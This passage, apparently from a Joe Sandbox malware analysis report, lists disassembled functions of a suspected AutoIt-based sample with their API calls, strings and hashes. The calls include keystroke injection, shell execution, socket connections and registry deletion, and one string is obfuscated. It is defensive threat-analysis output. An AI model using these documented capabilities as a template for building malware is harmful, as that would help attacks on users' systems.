                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b7377f2cc35d067b023b2bd7c64d5ce19d81f82fa6bde17bfe4d09df02790148
                                                        • Instruction ID: 445dc007c46802c9856cea2a267b689e224ba99aae0324b8e38d097290388b97
                                                        • Opcode Fuzzy Hash: b7377f2cc35d067b023b2bd7c64d5ce19d81f82fa6bde17bfe4d09df02790148
                                                        • Instruction Fuzzy Hash: 74619D71204200BBC750EB28CC89F6BB7A8FFD4714F14891CF556DB292EA75AD44CB92
                                                        Function 0083F41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 0083F448
                                                        • _memset.LIBCMT ref: 0083F511
                                                        • ShellExecuteExW.SHELL32(?), ref: 0083F556
                                                          • Part of subcall function 007C9837: __itow.LIBCMT ref: 007C9862
                                                          • Part of subcall function 007C9837: __swprintf.LIBCMT ref: 007C98AC
                                                          • Part of subcall function 007DFC86: _wcscpy.LIBCMT ref: 007DFCA9
                                                        • GetProcessId.KERNEL32(00000000), ref: 0083F5CD
                                                        • CloseHandle.KERNEL32(00000000), ref: 0083F5FC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                        • String ID: @
                                                        • API String ID: 3522835683-2766056989
                                                        • Opcode ID: a78a0758e49251083b0814cc04a08789d30d4a45adfe8d2d66681f7880f078b4
                                                        • Instruction ID: b3bed76ffcde3804d8890353fd952e7953d5d20916c85ed190244da78a6b189c
                                                        • Opcode Fuzzy Hash: a78a0758e49251083b0814cc04a08789d30d4a45adfe8d2d66681f7880f078b4
                                                        • Instruction Fuzzy Hash: 37618B75A00619DFCB04DF64C489AAEB7F5FF49310F14806DE956AB352CB34AD41CB90
                                                        Function 00820F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetParent.USER32(?), ref: 00820F8C
                                                        • GetKeyboardState.USER32(?), ref: 00820FA1
                                                        • SetKeyboardState.USER32(?), ref: 00821002
                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 00821030
                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 0082104F
                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 00821095
                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 008210B8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: MessagePost$KeyboardState$Parent
                                                        • String ID:
                                                        • API String ID: 87235514-0
                                                        • Opcode ID: 7d639d08948e71ee41d5b7470d2f974adec3c1329d7b16918caf864ab277031c
                                                        • Instruction ID: 8b50e29d4f8d0298aace2c8ae56c9b261d61b81ea50c971f7ca0452391c555b9
                                                        • Opcode Fuzzy Hash: 7d639d08948e71ee41d5b7470d2f974adec3c1329d7b16918caf864ab277031c
                                                        • Instruction Fuzzy Hash: C15104A0644BE53DFF3642349C09BB6BEA9FB16304F184589E1D4C58D3C6A4ECD4DB51
                                                        Function 00820D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetParent.USER32(00000000), ref: 00820DA5
                                                        • GetKeyboardState.USER32(?), ref: 00820DBA
                                                        • SetKeyboardState.USER32(?), ref: 00820E1B
                                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00820E47
                                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00820E64
                                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00820EA8
                                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00820EC9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: MessagePost$KeyboardState$Parent
                                                        • String ID:
                                                        • API String ID: 87235514-0
                                                        • Opcode ID: 203672d39a39c547f3281ee43c3cb41640877f4cca76f077f979b6d90eed381d
                                                        • Instruction ID: 29bf30ac32270dc80c0128b2e8355799cbacb572680575f9053b431f54c74ce0
                                                        • Opcode Fuzzy Hash: 203672d39a39c547f3281ee43c3cb41640877f4cca76f077f979b6d90eed381d
                                                        • Instruction Fuzzy Hash: 0151E4A05486E57DFB3283649C45B7ABEA9FB06300F088989F1D4C68C3D795ACD8DB61
                                                        Function 008255FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: _wcsncpy$LocalTime
                                                        • String ID:
                                                        • API String ID: 2945705084-0
                                                        • Opcode ID: f5524af16da64d84b65242a8f2fcdbabf33a892c3bfed89e15df12784ef27301
                                                        • Instruction ID: 9f57cd1b9a48cb1d10d2ac271629a07b08df9d3281a07db9085802893a99b072
                                                        • Opcode Fuzzy Hash: f5524af16da64d84b65242a8f2fcdbabf33a892c3bfed89e15df12784ef27301
                                                        • Instruction Fuzzy Hash: AB41DA65C52258B6CB11EBB59C4EACFB3BCEF08310F504465E504E3221FB38A295C7A6
                                                        Function 0084A056 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 130COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0R
                                                        • API String ID: 0-1916035689
                                                        • Opcode ID: c5827994f23da146ccba1b09e564ec6ef31c0a89820759dd4478d37f8dd57e00
                                                        • Instruction ID: 9ad38086d8bdd399b2bb7b430e0ef3494a41e1a834e5b8679c51979d98047c0a
                                                        • Opcode Fuzzy Hash: c5827994f23da146ccba1b09e564ec6ef31c0a89820759dd4478d37f8dd57e00
                                                        • Instruction Fuzzy Hash: 6B41C63598451CEFD728DF28CC88FAABBA8FB09310F150169F916EB2E1D7709D41DA51
                                                        Function 007C2344 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111keyboardCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCursorPos.USER32(?), ref: 007C2357
                                                        • ScreenToClient.USER32(008857B0,?), ref: 007C2374
                                                        • GetAsyncKeyState.USER32(00000001), ref: 007C2399
                                                        • GetAsyncKeyState.USER32(00000002), ref: 007C23A7
                                                        Strings
                                                        • dfew56dfew86dfew86dfewf6dfewe6dfewf6dfewf6dfewf6dfewf6dfew86dfew36dfew76dfewd6dfewd6dfewc6dfew06dfew06dfew76dfew46dfew46dfew06dfew, xrefs: 007FBFF9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: AsyncState$ClientCursorScreen
                                                        • String ID: dfew56dfew86dfew86dfewf6dfewe6dfewf6dfewf6dfewf6dfewf6dfew86dfew36dfew76dfewd6dfewd6dfewc6dfew06dfew06dfew76dfew46dfew46dfew06dfew
                                                        • API String ID: 4210589936-3792667901
                                                        • Opcode ID: 0265bb30a4d66b5328bef50f49600a8043a5a608466320c6a727f75a3ba1f896
                                                        • Instruction ID: d14298349b0600773d5cec1fe33058fe1a57b9647abdfe4ee10964242ac6fefd
                                                        • Opcode Fuzzy Hash: 0265bb30a4d66b5328bef50f49600a8043a5a608466320c6a727f75a3ba1f896
                                                        • Instruction Fuzzy Hash: 50417F35604109FBDF169F68CC44FE9BBB4FB05360F20431EF929922A1CB399951DB91
                                                        Function 00823671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0082466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00823697,?), ref: 0082468B
                                                          • Part of subcall function 0082466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00823697,?), ref: 008246A4
                                                        • lstrcmpiW.KERNEL32(?,?), ref: 008236B7
                                                        • _wcscmp.LIBCMT ref: 008236D3
                                                        • MoveFileW.KERNEL32(?,?), ref: 008236EB
                                                        • _wcscat.LIBCMT ref: 00823733
                                                        • SHFileOperationW.SHELL32(?), ref: 0082379F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                        • String ID: \*.*
                                                        • API String ID: 1377345388-1173974218
                                                        • Opcode ID: 6e91ffe96032218e56c242026ca4a13edfed454640c876c7c7ca44d4c1e928ea
                                                        • Instruction ID: 56130823c9747a1beffa18d42437c6420a69b020725d7991771f59320cfdc77e
                                                        • Opcode Fuzzy Hash: 6e91ffe96032218e56c242026ca4a13edfed454640c876c7c7ca44d4c1e928ea
                                                        • Instruction Fuzzy Hash: D94191B1108354AED752EF64D4559DF77ECFF99380F10082EB49AC3291EA38D689C752
                                                        Function 00840FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00840FD4
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00840FFE
                                                        • FreeLibrary.KERNEL32(00000000), ref: 008410B5
                                                          • Part of subcall function 00840FA5: RegCloseKey.ADVAPI32(?), ref: 0084101B
                                                          • Part of subcall function 00840FA5: FreeLibrary.KERNEL32(?), ref: 0084106D
                                                          • Part of subcall function 00840FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00841090
                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00841058
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                        • String ID:
                                                        • API String ID: 395352322-0
                                                        • Opcode ID: f0374745084a75f61e2cea694de0f304af14d9e0de5c15a04d95316e89588a2e
                                                        • Instruction ID: 18763a20987f27dbdf9774e7fbea4ae90fb587a29a1abad8ed6b9919e8338821
                                                        • Opcode Fuzzy Hash: f0374745084a75f61e2cea694de0f304af14d9e0de5c15a04d95316e89588a2e
                                                        • Instruction Fuzzy Hash: BD31087590160DAFDF159B94DC89EFFB7BCFF09340F00016AE601E2141EB759E899AA0
                                                        Function 0081DAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0081DB2E
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0081DB54
                                                        • SysAllocString.OLEAUT32(00000000), ref: 0081DB57
                                                        • SysAllocString.OLEAUT32(?), ref: 0081DB75
                                                        • SysFreeString.OLEAUT32(?), ref: 0081DB7E
                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 0081DBA3
                                                        • SysAllocString.OLEAUT32(?), ref: 0081DBB1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                        • String ID:
                                                        • API String ID: 3761583154-0
                                                        • Opcode ID: 179a455fbd4670ecdb3cde2efdbc41a09ac98c9b4dfbd48cf1173371b6120602
                                                        • Instruction ID: 2ac04713a474ed84ec8519d917115f836567829fde8bbd51061a1d3f406550a8
                                                        • Opcode Fuzzy Hash: 179a455fbd4670ecdb3cde2efdbc41a09ac98c9b4dfbd48cf1173371b6120602
                                                        • Instruction Fuzzy Hash: 11216D76604219AF9B109FA9DC88DEB73ACFF09370B018529FA15DB251DA749C8187A4
                                                        Function 00836173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00837D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00837DB6
                                                        • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 008361C6
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 008361D5
                                                        • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0083620E
                                                        • connect.WSOCK32(00000000,?,00000010), ref: 00836217
                                                        • WSAGetLastError.WSOCK32 ref: 00836221
                                                        • closesocket.WSOCK32(00000000), ref: 0083624A
                                                        • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00836263
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                        • String ID:
                                                        • API String ID: 910771015-0
                                                        • Opcode ID: e479dc8ad0201eae3f61508b6297068781e86220ef5affc6c38051879029c302
                                                        • Instruction ID: cd40e6eb34bbfe8dbe5672023a46505650c1f81d483849fc3c8e18b144a2c356
                                                        • Opcode Fuzzy Hash: e479dc8ad0201eae3f61508b6297068781e86220ef5affc6c38051879029c302
                                                        • Instruction Fuzzy Hash: 71318275600118AFDB10AF18CC89BBE77A9FF85714F05802DFA05D7292DB74A814CAA1
                                                        Function 0081F65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: __wcsnicmp
                                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                        • API String ID: 1038674560-2734436370
                                                        • Opcode ID: 3c77a27ceed03316a5cac35d904060f658e3ff0aca957a1dd4d30376eab4dfcf
                                                        • Instruction ID: f25231728d17e2fd1cf127901ba1d0d7109570bbf4ee962debd3d52eac66650c
                                                        • Opcode Fuzzy Hash: 3c77a27ceed03316a5cac35d904060f658e3ff0aca957a1dd4d30376eab4dfcf
                                                        • Instruction Fuzzy Hash: 5F2167B2205691A6D220A634AC06EE773DCFF6A314F204439FA4AC7193FB589DC2C394
                                                        Function 0081DBC4 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0081DC09
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0081DC2F
                                                        • SysAllocString.OLEAUT32(00000000), ref: 0081DC32
                                                        • SysAllocString.OLEAUT32 ref: 0081DC53
                                                        • SysFreeString.OLEAUT32 ref: 0081DC5C
                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 0081DC76
                                                        • SysAllocString.OLEAUT32(?), ref: 0081DC84
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                        • String ID:
                                                        • API String ID: 3761583154-0
                                                        • Opcode ID: 47798b22b474e8623d1490969324b7a24793eb1a0d9f5514b74dd26af198a233
                                                        • Instruction ID: a4c7e156622a427f71950e2a6cd8fd0001b5587c2fc685e7a6b933facdf47e89
                                                        • Opcode Fuzzy Hash: 47798b22b474e8623d1490969324b7a24793eb1a0d9f5514b74dd26af198a233
                                                        • Instruction Fuzzy Hash: 54212475605205AF9B10DFA8DC89DAB77ECFF09360B108529FA15CB261DAB4DC81C7A4
                                                        Function 008475CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 007C1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 007C1D73
                                                          • Part of subcall function 007C1D35: GetStockObject.GDI32(00000011), ref: 007C1D87
                                                          • Part of subcall function 007C1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 007C1D91
                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00847632
                                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0084763F
                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0084764A
                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00847659
                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00847665
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CreateObjectStockWindow
                                                        • String ID: Msctls_Progress32
                                                        • API String ID: 1025951953-3636473452
                                                        • Opcode ID: 6bbd53e9d68a7f501d246599f31ea54cdd5e659d085158b974bf03a0a6a620b3
                                                        • Instruction ID: 61d5ec9753fdad68f9182fed307cd1f93950c020bf22b2aa19156d490c03b2a6
                                                        • Opcode Fuzzy Hash: 6bbd53e9d68a7f501d246599f31ea54cdd5e659d085158b974bf03a0a6a620b3
                                                        • Instruction Fuzzy Hash: EC118EB211021DBEEF119F64CC85EE77F6EFF08798F014114BA08A20A0CB729C21DBA4
                                                        Function 007E9AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __init_pointers.LIBCMT ref: 007E9AE6
                                                          • Part of subcall function 007E3187: EncodePointer.KERNEL32(00000000), ref: 007E318A
                                                          • Part of subcall function 007E3187: __initp_misc_winsig.LIBCMT ref: 007E31A5
                                                          • Part of subcall function 007E3187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 007E9EA0
                                                          • Part of subcall function 007E3187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 007E9EB4
                                                          • Part of subcall function 007E3187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 007E9EC7
                                                          • Part of subcall function 007E3187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 007E9EDA
                                                          • Part of subcall function 007E3187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 007E9EED
                                                          • Part of subcall function 007E3187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 007E9F00
                                                          • Part of subcall function 007E3187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 007E9F13
                                                          • Part of subcall function 007E3187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 007E9F26
                                                          • Part of subcall function 007E3187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 007E9F39
                                                          • Part of subcall function 007E3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 007E9F4C
                                                          • Part of subcall function 007E3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 007E9F5F
                                                          • Part of subcall function 007E3187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 007E9F72
                                                          • Part of subcall function 007E3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 007E9F85
                                                          • Part of subcall function 007E3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 007E9F98
                                                          • Part of subcall function 007E3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 007E9FAB
